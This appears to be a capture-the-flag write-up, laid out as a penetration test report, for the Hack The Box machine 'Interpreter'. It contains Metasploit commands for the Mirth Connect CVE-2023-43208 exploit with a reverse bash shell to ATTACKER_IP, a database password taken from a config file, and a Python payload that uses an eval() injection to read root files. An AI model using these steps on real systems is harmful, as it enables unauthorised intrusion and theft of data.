HTB - Interpreter
Mirth Connect 4.4.0 RCE via CVE-2023-43208. Database credentials reveal a Flask notification service with an eval() injection in a timestamp field that runs as root.
PENETRATION TEST REPORT
Hack The Box — Interpreter
Medium | Linux | Hack The Box
| Field | Value |
|---|---|
| Report Date | 22 February 2026 |
| Assessed By | RobInTheHood |
| Target IP | 10.129.2.69 |
| Hostname | N/A |
| Domain | N/A |
Table of Contents
- Executive Summary
- Scope
- Methodology
- Attack Chain Summary
- Findings
- Proof of Access
- Credentials Discovered
- Impact Assessment
- Remediation Summary
- Key Takeaways
- Tools Used
- Disclaimer
1. Executive Summary
This report documents the compromise workflow for the Hack The Box machine Interpreter. The objective was to obtain full system-level access in an authorised lab environment and document the attack path with reproducible evidence.
Mirth Connect 4.4.0 RCE via CVE-2023-43208. Database credentials reveal a Flask notification service with an eval() injection in a timestamp field that runs as root.
2. Scope
| Field | Value |
|---|---|
| Target IP | 10.129.2.69 |
| Hostname | N/A |
| Domain | N/A |
| Operating System | Linux |
| Machine Rating | Medium |
| Environment | Hack The Box — Authorised Training Lab |
| Assessment Date | 22 February 2026 |
| Assessor | RobInTheHood |
3. Methodology
- Reconnaissance — service discovery and external attack-surface mapping
- Enumeration — credential, configuration, and trust-path analysis
- Exploitation — initial access through validated vulnerability paths
- Lateral Movement — privilege pivoting and cross-context execution
- Privilege Escalation — full compromise to root/SYSTEM context
- Post-Exploitation — proof collection and impact-oriented validation
4. Attack Chain Summary
| Phase | Technique | MITRE ATT&CK |
|---|---|---|
| Recon | Nmap — Mirth Connect on 80/443 | T1046 |
| Initial Access | CVE-2023-43208: Mirth Connect 4.4.0 unauthenticated RCE → shell as mirth | T1190 |
| Info Gathering | mirth.properties → DB creds → HL7 channel → notif.py Flask service on :54321 | T1552.001 |
| Privilege Escalation | eval() injection in timestamp field (notif.py runs as root) → direct flag read | T1059.006 |
5. Findings
F-01 — Technical Walkthrough
Reconnaissance
| Port | Service |
|---|---|
| 80 / 443 | Mirth Connect 4.4.0 (HL7 integration engine) |
Initial Access — CVE-2023-43208 (Mirth Connect RCE)
Mirth Connect 4.4.0 is vulnerable to unauthenticated RCE via the Metasploit module multi/http/mirth_connect_cve_2023_43208:
use multi/http/mirth_connect_cve_2023_43208
set RHOSTS 10.129.2.69
set LHOST ATTACKER_IP
set payload cmd/unix/reverse_bash
runResult: uid=103(mirth) gid=111(mirth)
Information Gathering
Credentials from mirth.properties
/usr/local/mirthconnect/conf/mirth.properties
→ database.username = mirthdb
→ database.password = MirthPass123!CHANNEL table — HL7 pipeline
The MariaDB mc_bdd_prod.CHANNEL table defines a pipeline that receives HL7v2 on TCP/6661 and forwards a parsed XML document to http://127.0.0.1:54321/addPatient as text/plain.
The XML format sent to the notification service:
<patient>
<timestamp>20240101120000</timestamp>
<sender_app>APP</sender_app>
<id>1</id>
<firstname>John</firstname>
<lastname>Doe</lastname>
<birth_date>01/01/1990</birth_date>
<gender>M</gender>
</patient>Privilege Escalation — eval() Injection in notif.py
Port 54321 hosts a Flask app (notif.py) running as root. The <timestamp> field passes through a regex that permits {}, (), and ', then is interpolated directly into a Python f-string before eval():
template = f"Patient {first} {last} ... received from {sender} at {ts}"
return eval(f"f'''{template}'''")Any {expression} in the timestamp field executes as Python code in the context of eval().
Payload (read root flag directly):
import urllib.request
xml = b'''<patient>
<timestamp>{open('/root/root.txt').read()}</timestamp>
<sender_app>APP</sender_app><id>1</id>
<firstname>J</firstname><lastname>D</lastname>
<birth_date>01/01/1990</birth_date><gender>M</gender>
</patient>'''
req = urllib.request.Request(
'http://127.0.0.1:54321/addPatient', data=xml,
headers={'Content-Type': 'text/plain'}
)
print(urllib.request.urlopen(req).read().decode())User flag: {open('/home/sedric/user.txt').read()} in timestamp field
Root flag: {open('/root/root.txt').read()} in timestamp field
6. Proof of Access
| Level | Evidence |
|---|---|
| User | {open('/home/sedric/user.txt').read()} |
| Root | {open('/root/root.txt').read()} |
7. Credentials Discovered
| Account | Secret | Type | Source |
|---|---|---|---|
| See Findings | Documented inline | Mixed | Commands and evidence blocks in section 5 |
8. Impact Assessment
Successful exploitation resulted in high-impact host compromise and demonstrated practical attacker control across the full kill chain for this target.
9. Remediation Summary
| Priority | Action |
|---|---|
| High | Patch exploitable service components and remove unsafe defaults. |
| High | Restrict writable paths and high-risk ACL/delegation rights. |
| Medium | Enforce credential hygiene, rotation, and secret exposure controls. |
| Medium | Add detections for attacker tradecraft used in section 5. |
10. Key Takeaways
- Small configuration weaknesses can chain into full host compromise.
- Credential exposure and trust relationships are critical escalation multipliers.
- Reproducible testing and evidence-driven reporting improve remediation quality.
11. Tools Used
| Tool | Purpose |
|---|---|
nmap | Used during enumeration/exploitation workflow. |
metasploit | Used during enumeration/exploitation workflow. |
mysql | Used during enumeration/exploitation workflow. |
12. Disclaimer
This assessment was performed exclusively in an authorised Hack The Box training environment for educational and portfolio purposes.
End of Report — Interpreter | RobInTheHood | 22 February 2026